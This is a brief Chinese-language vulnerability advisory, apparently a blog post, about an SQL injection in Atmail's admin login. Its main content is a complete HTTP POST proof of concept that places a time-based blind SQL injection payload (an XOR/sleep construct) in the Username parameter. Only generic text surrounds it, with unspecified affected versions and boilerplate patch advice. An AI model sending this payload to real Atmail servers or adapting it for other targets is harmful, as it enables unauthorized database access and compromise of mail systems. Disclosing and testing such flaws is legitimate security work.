问题描述
Atmail的某些版本中存在SQL注入,主要由于未对用户输入进行充分的验证和过滤。攻击者可以通过构造特定的HTTP请求,从而执行未经授权的操作。
受影响版本
该问题影响Atmail的特定版本,具体版本号可能因发现时间不同而有所变化。建议用户检查当前使用的Atmail版本,并确认是否在受影响范围内。
POC
POST /index.php/admin/index/login HTTP/1.1
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: https://ip:port/
Content-Length: 153
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,br
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Host: ip:port
Connection: Keep-alive
Language=ca&Password=1&Username=admin'XOR(if(now()=sysdate()%2Csleep(6)%2C0))XOR'Z&login=1&send=1&server=https://ip:port/
修复建议
及时更新Atmail到最新版本,通常软件供应商会在发现问题后发布安全补丁。确保所有安全更新都已应用,以减少被攻击的风险。
481

被折叠的 条评论
为什么被折叠?



